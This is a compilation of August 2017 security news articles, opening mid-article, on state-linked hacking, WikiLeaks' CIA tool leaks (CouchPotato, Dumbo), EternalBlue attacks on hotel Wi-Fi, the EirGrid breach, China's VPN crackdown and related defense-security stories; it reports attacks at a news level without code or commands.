
Trump's statement suggested the final shape of where the new unified command will fit into the Pentagon remains unsettled. Defense Secretary Jim Mattis is currently reviewing separating the Cyber Command from the NSA, he said.


Flashpoint Launches Intelligence Academy

18.8.2017 securityweek BigBrothers
New Intelligence Academy Aims to Help Organizations Reduce Risk by Better Understanding Threats and Prioritizing Response

Business Risk Intelligence (BRI) is a term that is easy to understand in concept, but difficult to action in practice. The problem is that business structures are all too often silos of individual responsibilities. Cyber security risk is a good example. Different cyber security control functions are often silos with little inter-control functionality. But cyber security itself is also a siloed department within the business -- again with little inter-departmental functionality.

Risk, however, is not siloed -- risk affects the whole business and honors no siloed structure. Risk management needs to be treated holistically, analyzing business risk rather than just cyber risk -- because, says Flashpoint's BRI principal advisor, Brian Mohr, in blog post, BRI includes not just cyber and insider risk, but also "global risk, fraud, anti-money laundering, executive protection, and physical security, to name a few." These risks are inter-related; and business needs to adopt an integrated approach to BRI.

The solution to risk is threat intelligence -- but most cyber threat intelligence sources are disjointed. For example, in a 2016 analysis of 88 IP-based blacklists and 35 domain name blacklists, Carnegie Mellon found that the majority of threat-indicated sources appeared on only one of the lists. For maximum threat intelligence, risk managers would need to subscribe to all the lists -- and risk being overwhelmed by noise within the intelligence. And they would still be limiting their intelligence to the cyber realm alone.

But for true business risk intelligence, many more factors need to be included -- such as geopolitical flashpoints, potential exchange rate fluctuations, staff travel arrangements and more. For example, "Few threats expose the true interdependency of cyber and physical security more than those targeting the oil and natural gas (ONG) sector," wrote Flashpoint CEO Josh Lefkowitz in a blog earlier this month. "After all, oil and natural gas together account for 53 percent of the world’s energy consumption and remain integral determinants of both global trade and the economy."

In its January 2017 Business Risk Intelligence Decision Report, Flashpoint expanded on this principle. "Traditional cyber threat intelligence, which has been largely focused on indicators of compromise, is insufficient in supporting the risk decision-making process, as it too often limits its focus on events in cyberspace," it warned. "Not all actors constrain their operations solely to the cyber realm; top tier nation-states like the U.S. and Russia use the full-spectrum of their capabilities to achieve their objectives. A threat assessment of Chinese or Russian cyber operations without the context of the national objectives they are supporting fails to provide risk decision-makers with an accurate portrayal of the threat landscape upon which to make business decisions."

To aid corporations take the required holistic view of business risk, Flashpoint offers its own BRI service. It gathers the intelligence and performs the analysis of that intelligence for its customers. It combines the different threat indicators into an holistic risk analysis, delivering integrated business risk intelligence.

But one basic problem remains -- not all companies know how to use the intelligence they receive. "Having spent my career in the government and the intelligence community, as well as at a Fortune 10 company," writes Mohr, "I understand without hesitation that the fundamental purpose of intelligence is to support decision-making. However, I also understand the struggles of implementing the intelligence lifecycle into practical business use."

Lefkowitz and his team at the New York, NY-based threat intelligence and research company have many years' experience of working both within national intelligence agencies and major international corporations. For example, Mohr spent 15 years as a Counterintelligence/Human Intelligence Specialist for the U.S. Marine Corps, conducting both human intelligence activities in support of U.S. combat units in the Middle East, as well as technical counterintelligence investigations across the Asia-Pacific theater. He then spent two years with the cyber threat intelligence team at American Express.

It is this combination of pure intelligence analysis and business understanding that Flashpoint now wishes to disseminate. It has today launched the Flashpoint Intelligence Academy (FIA). Its purpose is to help organizations understand how to structure an action program that embraces the full combined intelligence of BRI.

"We created FIA as a means to transfer what we’ve learned from our own experiences in building intelligence programs to our customers in a meaningful way," explains Mohr. "I came to Flashpoint because I realized that the company was helping its customers, not from the standpoint of just blocking IOCs, but actually supporting customers to reduce their overall risk. And I know FIA is the program to continue to support that goal."

The FIA offers foundational (one-day sessions); intermediate (two or three-day sessions); and advanced workshops. These workshops are available to any organization involved in actioning BRI, and not just Flashpoint customers. "Using the BRI principles taught in these workshops," says the on-site blurb, "organizations can better understand the threats they may face, prioritize their responses, make more informed decisions, and become a source for developing and driving risk intelligence application across the business."

Flashpoint raised $28 million in Series C funding in July 2017, after raising $10 million in July 2016.


U.S. Army to Protect Warfighters With Continuous Biometric Authentication

17.8.2017 securityweek BigBrothers
U.S. Army's NETCOM to Deploy Continuous Biometric Authentication Software to Protect Warfighters

The fundamental basis of security is to stop bad guys (or things) getting in; and then, if that fails, to discover those who got in as rapidly as possible. Authentication is used for the former, and network anomaly detection is increasingly used for the latter.

Both controls can be good in theory, but often fall down in practice; the more effective they are, the more intrusive they become. Authentication can be strengthened by enforcing strong unmemorable passwords, and multi-factor authentication -- often making it difficult and time-consuming for the user. Anomaly detection can be improved by reporting and responding to every single alert -- often overwhelming security analysts with the sheer volume of work.

To solve both problems, companies often set their security barriers lower than they could be. Authentication is made easier and alerts are set lower so that work is less interrupted. As a result, adversaries can get into the network and stay hidden long enough to cause damage -- and this is demonstrated every week by new announcements of both major and minor breaches.

Plurilock believes it may have the answer in low-friction continuous behavioral biometric user authentication. Called BioTracker, the product continuously (sampling every few seconds) monitors the user, analyzing key stroke and mouse patterns and using artificial intelligence (AI) to provide a probability score on the current user being the authorized user.

In its own words, Plurilock today announced, "The U.S. Army Network Enterprise Technology Command (NETCOM) will deploy Plurilock’s BioTracker continuous authentication cybersecurity software to protect the warfighter against adversarial identity compromise."

Keith Trippie, retired executive director for the Enterprise System Development Office with the U.S. Department of Homeland Security, explains, “BioTracker enhances government and corporate cybersecurity by bolstering existing authentication capabilities such as CACs, two-factor, multi-factor and even biometric authentication, to safeguard vital data, intelligence systems and privileged accounts from both sophisticated cyber campaigns and insider threats. Plurilock’s platform provides reliable, real-time visibility and security with virtually zero authorized user friction."

This means that the initial user authentication barrier can be set very low, so that daily work is not interrupted. From then on, BioTracker monitors the user against known biometric behavioral patterns. Plurilock claims that it takes just 20 minutes to learn a user’s keystroke style and speed, mouse use and other behaviors to build a biometric profile.

CEO Ian Paterson told SecurityWeek that face and voice recognition could be added to the mix, but they had been omitted because of privacy issues from both users and privacy regulations in a corporate environment. Other biometric methods such as fingerprint scans and iris scans increase user friction and remain point rather than continuous authentication.

"Our method," he said, "satisfies privacy issues and introduces zero user friction." Furthermore, he added, it solves a major weakness in biometric authentication. "People change, both with age and over time. BioTracker's continuous monitoring of the user's biometric behavior allows it to detect these slow and minute changes, feeding them back into the known user profile and maintaining biometric accuracy."

Continuous user monitoring marks a huge change from the binary accept/reject approach of traditional user authentication. It is made possible by BioTracker's AI engine. AI generally deals with probability scores rather than just on/off. This allows greater flexibility. For example, the possibility of false positives can be reduced by progressively limiting access. Thus, if for any reason, a user's pattern is slightly off (stress, illness, post-party hangover) BioTracker can be used to limit access to particularly sensitive parts of the network until the user's authenticity is validated.

It is more likely, however, that this biometric monitoring will clearly indicate whether the user is the authorized user. Since the sampling is done every few seconds, recognition that an intruder is on the network is confirmed within seconds of the intrusion. This is where BioTracker can reduce the workload on security analysts. Rather than having to wait for and triage a large number of network anomalies, the analysts know within seconds that it has occurred, and exactly where it occurred. Containment can be effected within minutes of the intrusion.

“Plurilock," explains Paterson, "offers dependable protection against security breaches with real-time detection and immediate notification in the event of unusual user behavior, to reduce risk and cut detection and resolution time from many months to mere minutes, saving precious time and money. Its proof-of-presence technology also ensures outstanding compliance to meet even the most stringent regulatory mandates, and because there are no manual authentication procedures required, it has zero impact on productivity. Users can go about their normal activities with the confidence that Plurilock has them covered.”


North Korea-Linked Hackers Target U.S. Defense Contractors

14.8.2017 securityweek BigBrothers
The North Korea-linked cyber espionage group known as Lazarus is believed to be behind attacks targeting individuals involved with United States defense contractors, Palo Alto Networks reported on Monday.

The threat actor, which has been active since at least 2009, is said to be responsible for several high-profile attacks, including the 2014 attack targeting Sony Pictures. Links have also been found to the recent WannaCry ransomware attacks.

The Lazarus group, tracked by the U.S. government as Hidden Cobra and known by security firms for its Operation Blockbuster, Dark Seoul and Operation Troy campaigns, continues to be active. Recent attacks observed by Palo Alto Networks against U.S. defense contractors appear to have been launched either by this group directly or in cooperation with other cyberspies.

According to researchers, the hackers have sent out spear phishing emails containing weaponized Microsoft Office documents written in English that use macros to deliver a piece of malware.

Specifically, Palo Alto has seen decoy documents describing job openings at some U.S. defense contractors. The text in these documents appears to be an exact copy, including typos, of job descriptions available on the legitimate company’s website.

There are several links between these attacks and other recent campaigns, including very similar macros, decoy document details, command and control (C&C) servers, and payloads.

“This reuse of macro source code, XOR keys used within the macro to decode implant payloads, and the functional overlap in the payloads the macros write to disk demonstrates the continued use of this tool set by this threat group. The use of an automated tool to build the weaponized documents would explain the common but not consistent reuse of metadata, payloads, and XOR keys within the documents,” researchers explained.

Palo Alto Networks pointed out that the tools and tactics used by the group have changed only little compared to previous campaigns, despite the numerous reports describing its activities. This has led experts to believe that the Lazarus group will continue to launch targeted attacks.

While the gang has been tied to several espionage and destruction campaigns, many of its recent attacks appear to have focused on financial institutions, including Bangladesh’s central bank and banks in Poland.


Cyberspies Are Using Leaked NSA Hacking Tools to Spy On Hotels Guests
12.8.2017 thehackernews  BigBrothers

Cyberspies Are Using Leaked NSA Hacking Tools to Spy On Hotels Guests
An infamous Russian-linked cyber-espionage group has been found re-using the same leaked NSA hacking tool that was deployed in the WannaCry and NotPetya outbreaks—this time to target Wi-Fi networks to spy on hotel guests in several European countries.
Security researchers at FireEye have uncovered an ongoing campaign that remotely steals credentials from high-value guests using Wi-Fi networks at European hotels and attributed it to the Fancy Bear hacking group.
Fancy Bear—also known as APT28, Sofacy, Sednit, and Pawn Storm—has been operating since at least 2007 and also been accused of hacking the Democratic National Committee (DNC) and Clinton Campaign in an attempt to influence the U.S. presidential election.
The newly-discovered campaign is also exploiting the Windows SMB exploit (CVE-2017-0143), called EternalBlue, which was one of many exploits allegedly used by the NSA for surveillance and leaked by the Shadow Brokers in April.
EternalBlue is a security vulnerability which leverages a version of Windows' Server Message Block (SMB) version 1 networking protocol to laterally spread across networks and also allowed the WannaCry and Petya ransomware to spread across the world quickly.
Since the EternalBlue code is available for anyone to use, cyber criminals are widely trying to use the exploit to make their malware more powerful.
Just last week, a new version of credential stealing TrickBot banking Trojan was found leveraging SMB to spread locally across networks, though the trojan was not leveraging EternalBlue at that time.
However, researchers have now found someone deploying the exploit to upgrade their attack.
"To spread through the hospitality company's network, APT28 used a version of the EternalBlue SMB exploit," FireEye researchers write. "This is the first time we have seen APT28 incorporate this exploit into their intrusions."
Researchers have seen ongoing attacks targeting a number of companies in the hospitality sector, including hotels in at least seven countries in Europe and one Middle Eastern country.
Here's How the Attack is Carried Out
The attacks began with a spear phishing email sent to one of the hotel employees. The email contains a malicious document named "Hotel_Reservation_Form.doc," which uses macros to decode and deploy GameFish, malware known to be used by Fancy Bear.
Once installed on the targeted hotel's network, GameFish uses the EternalBlue SMB exploit to laterally spread across the hotel network and find systems that control both guest and internal Wi-Fi networks.
Once under control, the malware deploys Responder, an open source penetration testing tool created by Laurent Gaffie of SpiderLabs, for NetBIOS Name Service (NBT-NS) poisoning in order to steal credentials sent over the wireless network.
While the hacking group carried out the attack against the hotel network, researchers believe that the group could also directly target "hotel guests of interest"—generally business and government personnel who travel in a foreign country.
The researchers revealed one such incident that occurred in 2016 where Fancy Bear accessed the computer and Outlook Web Access (OWA) account of a guest staying at a hotel in Europe, 12 hours after victim connected to the hotel’s Wi-Fi network.
This is not the only attack that apparently aimed at guests of hotels. South Korea-nexus Fallout Team (also known as DarkHotel) has previously carried out such attacks against Asian hotels to steal information from senior executives from large global companies during their business trips.
Duqu 2.0 malware also found targeting the WiFi networks of European hotels used by participants in the Iranian nuclear negotiations. Also, high-profile people visiting Russia and China may have their laptops and other electronic devices accessed.
The easiest way to protect yourself is to avoid connecting to hotel Wi-Fi networks or any other public or untrusted networks, and instead, use your mobile device hotspot to get access to the Internet.


CIA's "CouchPotato" Collects Video Streams

12.8.2017 securityweek BigBrothers
WikiLeaks has published documents that describe a remote tool allegedly used by the U.S. Central Intelligence Agency (CIA) to collect RTSP/H.264 video streams.

Dubbed “CouchPotato,” the tool can apparently be used to collect the stream as a video file (AVI), or to capture still images (JPG) of frames from the stream, as long as these frames are “of significant change from a previously captured frame.”

To perform the video and image encoding and decoding operations, the tool leverages the free software project FFmpeg. However, many audio and video codecs, along with unnecessary features, have been removed from the FFmpeg version used by CouchPotato.

To provide the tool with image change detection features, the pHash image hashing algorithm has been integrated into FFmpeg’s image2 demuxer. CouchPotato also uses RTSP connectivity and “relies on being launched in an ICE v3 Fire and Collect compatible loader,” the tool’s user guide published on WikiLeaks reveals (PDF).

Thus, the use of this tool requires a loader that can support the ICE v3 specification (Fire and Collect are mentioned as suitable options, along with ShellTerm, which was used to test CouchPotato during development). Python 2 is required by the module handler script, which should also be run on a *nix host, the same host the loader runs onto.

To avoid being blocked by a firewall when sending or receiving data, CouchPotato should be injected into a non-critical host process on the target machine, the documents explained. The user manual specifically recommends not to launch out of a process critical to the system’s stability. The tool can be operated using a command-line interface.

Targeting RTSP and H.264 video formats, which are normally used by IP-based surveillance cameras streaming video content over LAN or the Internet, CouchPotato requires the video stream URL to function and doesn’t necessarily require compromising the target’s network.

The user guide published on WikiLeaks includes details on the various arguments the tools comes with support for, along with the various limitations and caveats the tool inherits, such as high CPU usage for the injected process.


Wikileaks – CIA CouchPotato remote tool can stealthy collect RTSP/H.264 video streams
11.8.2017 securityaffairs BigBrothers

WikiLeaks has published another Vault 7 leak, revealing the CIA tool CouchPotato that allows operators to remotely spy on video streams in real-time.
“Today, August 10th 2017, WikiLeaks publishes the the User Guide for the CoachPotato project of the CIA. CouchPotato is a remote tool for collection against RTSP/H.264 video streams. It provides the ability to collect either the stream as a video file (AVI) or capture still images (JPG) of frames from the stream that are of significant change from a previously captured frame. It utilizes ffmpeg for video and image encoding and decoding as well as RTSP connectivity. CouchPotato relies on being launched in an ICE v3 Fire and Collect compatible loader.” states Wikipedia.

The document leaked from the CIA details how the tool could be used by cyber spies to remotely capture RTSP/H.264 video streams.

The Real Time Streaming Protocol ( RTSP), is a network control protocol designed for controlling streaming media servers.

“CouchPotato is a remote tool for collection against RTSP/H.264 video streams. It provides the ability to collect either the stream as a video file (AVI) or capture still images (JPG) of frames from the stream that are of significant change from a previously captured frame. CouchPotato utilizes ffmpeg for video and image encoding and decoding as well as RTSP connectivity.” reads the user guide. “In order to minimize size of the DLL binary, many of the audio and video codecs along with other unnecessary features have been removed from the version of ffmpeg that CouchPotato is built with. pHash, an image hashing algorithm, has been incorporated into ffmpeg’s image2 demuxer to provide image change detection capabilities. CouchPotato relies on being launched in an ICE v3 Fire and Collectcompatible loader.”

CouchPotato

The CouchPotato tool utilizes FFmpeg for video and image encoding and decoding and Real Time Streaming Protocol connectivity.

The CouchPotato tool is hard to detect, it supports the file-less ICE v3 “Fire and Collect” loader, which is an in-memory code execution (ICE) technique.

The documents don’t include details on how the CIA operators compromise the target systems. It is likely the CouchPotato tool needs to be used in conjunction with other hacking tools to penetrate the targeted systems.

Below the list of release published by Wikileaks since March:

Couchpotato – 10 August, 2017
Dumbo– 03 August, 2017
Imperial – 27 July, 2017
UCL/RAYTHEON – 19 July, 2017
HighRise – 13 July, 2017
BothanSpy and Gyrfalcon – 06 July, 2017
OutlawCountry – 30 June, 2017
ELSA malware – 28 June, 2017
Cherry Blossom – 15 June, 2017
Pandemic – 1 June, 2017
Athena – 19 May, 2017
AfterMidnight – 12 May, 2017
Archimedes – 5 May, 2017
Scribbles – 28 April, 2017
Weeping Angel – 21 April, 2017
Hive – 14 April, 2017
Grasshopper – 7 April, 2017
Marble Framework – 31 March, 2017
Dark Matter – 23 March, 2017


Experts Who Hacked U.S. Air Force Earned $130,000

11.8.2017 securityweek BigBrothers
Hundreds of bug bounty hunters signed up for the U.S. Department of Defense’s “Hack the Air Force” initiative and they earned more than $130,000 for the vulnerabilities they reported.

Between May 30 and June 23, the Pentagon invited vetted researchers, members of the military and government civilians from the United States, the United Kingdom, Canada, Australia and New Zealand to take a crack at the Air Force’s networks. Hack the Air Force, hosted by the HackerOne platform, was the most open federal program to date.

A total of 272 hackers signed up and they submitted 207 valid vulnerability reports. The first flaw was reported in less than one minute of the bug bounty program’s launch.

The more than 200 vulnerabilities earned participants over $130,000, an average of $644 per flaw.

Only two of the white hat hackers who submitted valid reports were employed by the military. The researcher who earned the most was a 17-year-old who submitted 30 valid reports.

“Adversaries are constantly attempting to attack our websites, so we welcome a second opinion — and in this case, hundreds of second opinions — on the health and security of our online infrastructure,” said Peter Kim, CISO of the U.S. Air Force. “By engaging a global army of security researchers, we’re better able to assess our vulnerabilities and protect the Air Force’s efforts in the skies, on the ground and online.”

While the Hack the Air Force initiative is over, experts who find vulnerabilities in the organization’s systems can still report them to the Pentagon through its ongoing vulnerability disclosure program.

A total of 371 people registered for the previous Hack the Army program and they were awarded roughly $100,000 for 118 valid vulnerability reports. Hack the Pentagon received 138 valid submissions and it cost the U.S. government $150,000, half of which went to participants.


CouchPotato: CIA Hacking Tool to Remotely Spy On Video Streams in Real-Time

10.8.2017 thehackernews BigBrothers

After disclosing CIA's strategies to hijack and manipulate webcams and microphones to corrupt or delete recordings, WikiLeaks has now published another Vault 7 leak, revealing CIA's ability to spy on video streams remotely in real-time.
Dubbed 'CouchPotato,' document leaked from the CIA details how the CIA agents use a remote tool to stealthy collect RTSP/H.264 video streams.
Real Time Streaming Protocol, or RTSP, is a network control protocol designed for use in entertainment and communication systems for controlling streaming media servers.
CouchPotato gives CIA hackers ability to "collect either the stream as a video file (AVI) or capture still images (JPG) of frames from the stream that are of significant change from a previously captured frame," a leaked CIA manual reads.
The tool utilises FFmpeg for video and image encoding and decoding and Real Time Streaming Protocol connectivity.
The CouchPotato tool works stealthily without leaving any evidence on the targeted systems because it has been designed to support ICE v3 "Fire and Collect" loader, which is an in-memory code execution (ICE) technique that runs malicious code without the module code being written to the disk.
However, neither Wikileaks nor the leaked user guide details how the agency penetrates into the targeted systems at the first place, but since the publication has previously leaked many CIA malware, exploits and hacking tools to get into a network, the agency might have been using CouchPotato in combining with other tools.
Previous Vault 7 CIA Leaks
Since March, WikiLeaks has published 20 batches of "Vault 7" series, which includes the latest and last week leaks, along with the following batches:
Imperial — Details of at least 3 CIA-developed hacking tools and implants designed to target PCs running Apple Mac OS X and different flavours of Linux operating systems.
UCL/Raytheon — An alleged CIA contractor, which analysed in-the-wild malware and hacking tools and submitted at least five reports to the agency for help the CIA developed its own malware.
Highrise — An alleged CIA project that let the spying agency stealthy collects and forwards stolen data from compromised smartphones to its server via SMSes.
BothanSpy and Gyrfalcon — 2 alleged CIA implants that let the CIA intercept and exfiltrate SSH credentials from targeted Windows and Linux PCs using different attack vectors.
OutlawCountry – An alleged CIA project that allowed the spying agency to hack and remotely spy on systems running Linux OS.
ELSA – Alleged CIA malware that tracks geo-location of targeted computers and laptops running the Microsoft Windows OS.
Brutal Kangaroo – A tool suite for Microsoft Windows OS used by the CIA agents to target closed networks or air-gap computers within an organisation or enterprise without requiring any direct access.
Cherry Blossom – A framework employed by the agency to monitor the Internet activity of the targeted systems by exploiting flaws in Wi-Fi devices.
Pandemic – A CIA's project that allowed the spying agency to turn Windows file servers into covert attack machines that can silently infect other PCs of interest inside the same network.
Athena – A spyware framework that the agency designed to take full control over the infected Windows systems remotely and works against every version of Windows OS–from Windows XP to Windows 10.
AfterMidnight and Assassin – 2 alleged CIA malware frameworks for the Microsoft Windows platform that's meant to monitor and report back actions on the infected remote host PC and execute malicious actions.
Archimedes – Man-in-the-middle attack tool reportedly developed by the CIA to target computers and laptops inside a Local Area Network (LAN).
Scribbles – Software supposedly designed to embed 'web beacons' into confidential files and documents, allowing the CIA to track insiders and whistleblowers.
Grasshopper – A framework that allowed the spying agency to quickly create custom malware for breaking into Microsoft Windows OS and bypassing antivirus protection.
Marble – Source code of a secret anti-forensic framework used by the CIA agents to hide the actual source of its malware.
Dark Matter – Hacking tools the spying agency used to target iPhones and Macs.
Weeping Angel – Spying tool used by the CIA to infiltrate smart TVs, and transforming them into covert microphones.
Year Zero – CIA hacking tools and exploits for popular hardware and software.


Kenya Opposition Claims Vote Has Been Hacked

9.8.2017 securityweek BigBrothers

Hackers broke into the database of Kenya's electoral commission and manipulated the results of the election, the leader of the country's opposition coalition alleged on Wednesday.

Vote counting is ongoing in east Africa's strongest democracy after Tuesday's election where voters were asked to either re-elect President Uhuru Kenyatta or replace him with longtime opposition leader Raila Odinga.

Odinga claims hackers used the credential of a murdered employee of the electoral commission (IEBC) to hack into an electronic voting system and activate an algorithm that inflated Kenyatta's votes.

"These results are fake, it is a sham. They cannot be credible," Odinga told reporters at a morning press conference.

"This is an attack on our democracy. The 2017 general election was a fraud."

He later released what he claimed was a log from an IEBC server to support his allegations that the server was configured to increase Kenyatta's totals by 11 percent and cover up the modifications.

The log, and Odinga's allegations, have not been independently verified.

With ballots from 92 percent of polling stations counted, electoral commission (IEBC) results showed Kenyatta leading, with 54.4 percent of the nearly 13 million ballots tallied, against Odinga's 44.7 percent, a difference of 1.3 million votes.

But Odinga believes the vote is actually in his favour, and tweeted that a count of ballots by his National Super Alliance (NASA) coalition showed him in the lead.

He said the hacking affected all the results, both the presidential and the general election.

The hackers were able to access the system using the credentials of Chris Msando, a top IT official at the IEBC found tortured and murdered in late July, Odinga said.

He would not say how he got the information, saying he wanted to protect his source.

The 72-year-old is making his fourth bid for the presidency, and has previously accused his rivals of stealing victory from him through rigging in 2007 and in 2013.

In 2007, the disputed vote resulted in two months of ethnically driven political violence that killed 1,100 people and displaced 600,000, a major blow to a nation seen as a regional bastion of stability.

The contested election in 2013 was taken to the courts and ended largely peacefully, though Odinga lost.

Odinga urged his supporters to "remain calm as we look deep into this matter," but added: "I don't control the people."


China's Web Users Fear Losing Tools to Bypass 'Great Firewall'

8.8.2017 securityweek BigBrothers
Enterprising internet users in China fear the tools they use to tunnel through the country's "Great Firewall" may soon disappear, as Beijing tightens its grip on the web.

Tens of millions of people are estimated to use Virtual Private Networks (VPNs) to bypass Chinese internet restrictions -- getting access to blocked websites such as Facebook and Twitter.

Beijing has for years turned a blind eye to these holes in its Great Firewall, but recent events suggest the virtual tunnels may soon be bricked up.

In January China's Ministry of Industry and Information Technology (MIIT) announced it would be banning the use of unlicensed providers of the services.

In the months since the rule's announcement, rumours have swirled that a crackdown was coming, but there was little clarity on what exactly the rule meant and how, or even if, it would be implemented.

In the past few weeks, however, omens of significant tightening seem to be everywhere.

Several luxury hotels in Beijing have said they will stop using the tools, which once provided unfiltered Internet as a convenience to their customers.

On Thursday, a cloud service provider in the capital notified users that it would practise shutting down and reporting VPN providers on the orders of Beijing's Public Security bureau.

Tech giants Apple and Amazon, too, have moved to limit their customers' access to the tools in China in what has been seen as a voluntary move to get ahead of the impending crackdown.

On Sunday, Apple said it was removing a number of the programs from its app store, while Amazon's Chinese partner said that customers would no longer be allowed to use "illegal" VPNs on its cloud service.

"There have been many rounds of government murmurings about VPN crackdowns, and foreign and Chinese businesses had grown used to only minor or temporary restrictions," said Graham Webster, a senior researcher scholar at Yale Law School.

But "this time appears different."

'You cannot lock the heart'

For now, however, it still remains unclear who will be able to access VPNs and under what circumstances, a situation that has left both companies and regular users on tenterhooks.

Ordinary people have reacted to the new rules with a mixture of annoyance and quiet defiance.

"You've blocked the last way to watch US TV dramas, as well as my Facebook friends!" one user of China's Twitter-like Weibo platform said after the Apple announcement.

"You can lock my cellphone, but you cannot lock my heart."

Firms are casting around for information about the developments and have expressed alarm at the potential impact on the way they do business.

In a statement, the European Chamber of Commerce told AFP it "has not seen any updated official document concerning restrictions on VPN use by companies," adding that in a recent survey of its members almost half expressed concern that the "continued strengthening of measures to tighten Internet control and access are having an even bigger negative impact on their companies".

"Our members' success depends on instantaneous access to information worldwide, and the ability to freely communicate with affiliates, suppliers and customers around the world," William Zarit, Chairman of the American Chamber of Commerce in China said in a statement to AFP.

"Recent regulatory developments, including limiting VPN use, have created uncertainty for cross-border data communication."

Apple has come under fire for bowing to the rules, but in an earnings call Tuesday CEO Tim Cook said the firm had to follow local laws.

He said Apple was "hopeful that over time the restrictions we're seeing are lessened, because innovation really requires freedom to collaborate and communicate".

'Tighten Internet control'

Analysts said that Beijing was likely not looking to choke off VPNS completely, but was instead seeking to control them more tightly.

James Gong, an expert on Chinese cyber law at Herbert Smith Freehills, said that the regulations are not targeted at companies.

The government can "shut things down, but that's not their purpose," he said.

Instead "they want to drive all the traffic through the network operators so all of the connections will be transparent to them".

Paul Triolo, head of global technology at the Eurasia Group, said he believes that the ultimate goal is not to cut off all VPNs but to "get visibility on (their) use so that they know what is going in and out and can turn off selectively if they want to or need to".

In a statement to AFP last month, MIIT explained that under the new rules, companies will only be allowed to rent VPN services from "telecommunications operators that have set up an international communications entry and exit office in accordance with the law".

Previously released MIIT regulations state that only state-owned telecoms can set up the offices, effectively guaranteeing that all licensed VPNs are operated by the state.

A representative from state-owned telecom China Unicom confirmed to AFP that it was legally allowed to rent VPN services to businesses, as long as they provide proof of registration in China.

"It's highly unlikely that all VPN access would be eliminated," Yale's Webster said, but added in the future the software might be increasingly "expensive and government-controlled".


Irish electricity transmission system operator EirGrid targeted by a nation-state actor
8.8.2017 securityaffairs BigBrothers

The Irish electricity transmission system operator EirGrid was targeted by a state-sponsored actor, the hackers weren’t discovered at least for two months.
The Irish electricity transmission system operator EirGrid was targeted by a state-sponsored attack. EirGrid is the state-owned company that operates the electricity transmission grid across the Ireland, it also supplies the distribution network operated by ESB Networks that powers every electricity customer in the country.

According to the Independent.ie, a nation-state actor, using IP addresses sourced in Ghana and Bulgaria targeted the company. The hackers first gained access to a Vodafone network used by EirGrid in the UK in April, then they compromised the routers used by Irish operator in Wales and Northern Ireland.

The hackers were able to install “a virtual wire tap”, also known as Generic Routing Encapsulation (GRE) tunnel into Eirgrid’s Vodafone router located in Shotton. The GRE allowed them to access the unencrypted traffic sent to and from the companies.

According to the Independent.ie the hackers weren’t discovered at least for two months and the worst aspect of the story is that sources informed of the hack confirmed that it is still not known if any malware still present onto EirGrid’s control systems.
EirGrid

An attacker could be interested in hacking systems at the company to trigger a massive power outage across the country.
“Independent.ie has learned that the hack came to light after a tip-off from Vodafone and the National Cyber Security centre in the UK to EirGrid.” reported the Independent.ie.

“Vodafone discovered that there had been a breach on their Direct Internet Access (DIA) service which is internet provider to Eirgrid’s interconnector site in Shotton, Wales. The original breach took place on April 20 and lasted just short of seven hours.”
A source said that both Vodafone and the National Cyber Security Centre believe the attack was powered by a nation-state actor, while police services in Ireland and the UK do not believe that it was powered by foreign hackers.
Independent.ie discovered that all communications leaving the Eirgrid site and passing through the DIA router were “monitored and maybe interrogated” by a third party with direct access to the device.
At the time of this post, Vodafone is still investigating the volume of traffic transferred over the GRE tunnel.

“However it was able to tell the state supplier that all the compromised router devices had their firmware and files copied by the attackers.” state the Independent.

“A source said this allows the hackers to inspect the network configuration of Vodafone and “possibly launch a further more devious attack through some unknown vulnerabilities”.”
A further internal investigation revealed that the offices of the System Operator for Northern Ireland (SONI), that is wholly owned by EirGrid, were also exposed due to the cyber attack.
“At EirGrid Group, the security of our computer network and of the electricity control system is an utmost priority.” said David Martin, a spokesperson for EirGrid Group.

“We take all necessary steps to ensure that our systems are secure and protected and we remain vigilant to potential cyber threats, by continuously monitoring the external environment and by engaging with the relevant authorities.”
“It is EirGrid Group’s policy not to comment publicly on specific operational matters related to cyber security, however, we are aware of the currently reported focus on energy companies and national infrastructure and wish to state that our computer systems have not been breached.”

“Vodafone does not comment on specific security incidents. In such cases we always work closely with the relevant authorities to investigate and take immediate actions to contain the issue and protect our customers.” said a Vodafone spokesman.


US Army bans use of Chinese DJI drones over cyber security concerns
7.8.2017 securityaffairs BigBrothers

The US Army has ordered its units to stop using Chinese DJI drones because of “cyber vulnerabilities” in the products.
The US Army is going to ban its units from using drones manufactured by the Chinese firm DJI due to “cyber vulnerabilities”.

The decision was based on the findings of a research conducted by the Army Research Laboratory and the navy that discovered vulnerabilities in DJI products.

A memo issued by the US Army’s Lieutenant General Joseph Anderson orders all US Army units that are currently employing DJI drones to stop using them.

DJI (Da-Jiang Innovation Corporation) is a Chinese firm based in Shenzhen, Goldman Sachs and Oppenheimer estimated in 2016 that DJI had about 70 percent share of the global commercial and consumer drone market.

In the memo, soldiers are also ordered to remove all batteries and storage media from their DJI drones and await further instructions.

“Due to increased awareness of cyber vulnerabilities associated with DJI products, it is directed that the US Army halt use of all DJI products,” states the memo.

DJI disappointed to read about the alleged ban of the US Army of using DJI drones.

DJI drones

DJI’s Public Relations Manager, Michael Perry, sent the following email to sUAS News:

“We are surprised and disappointed to read reports of the U.S. Army’s unprompted restriction on DJI drones as we were not consulted during their decision. We are happy to work directly with any organization, including the U.S. Army, that has concerns about our management of cyber issues.”

“We’ll be reaching out to the U.S. Army to confirm the memo and to understand what is specifically meant by ‘cyber vulnerabilities’.”

A U.S. Army spokesperson confirmed that the memo was issued and added that they are currently reviewing it.

The DJI made the headlines in April 2016 when the company received the pressure of the Chinese government to gain access to the data collected by its drones, included telemetry, GPS location data, flight records and possibly video shot by users and uploaded to its servers.


Wikileaks – CIA Dumbo tool allows agents to disable security cameras
4.8.2017 securityaffairs BigBrothers

Wikileaks published a new batch of files belonging to the CIA Vault 7 archive that reveals the ‘Dumbo’ tool used by the agents to disable security cameras.
Wikileaks published a new batch of files belonging to the CIA Vault 7 archive, the documents detail a tool code named ‘Dumbo‘ that was developed by the intelligence agency to disables security cameras and corrupts recordings.

It identifies installed devices like webcams and microphones, either locally or connected by wireless (Bluetooth, WiFi) or wired networks.

CIA agents have to execute “Dumbo” directly from a USB thumb drive in the targeted device, it requires SYSTEM privileges to perform its activity.

The tool supports 32bit Windows XP, Windows Vista, and newer versions of Windows operating system. 64bit Windows XP or Windows versions prior to XP are not supported.

The tool is able to mute microphones, disable network adapters, and suspend processes utilizing webcams and corrupt any video recordings.

“Dumbo is a capability to suspend processes utilizing webcams and corrupt any video recordings that could compromise a PAG deployment. The PAG (Physical Access Group) is a special branch within the CCI (Center for Cyber Intelligence); its task is to gain and exploit physical access to target computers in CIA field operations.” states the description of the tool provided by Wikileaks.

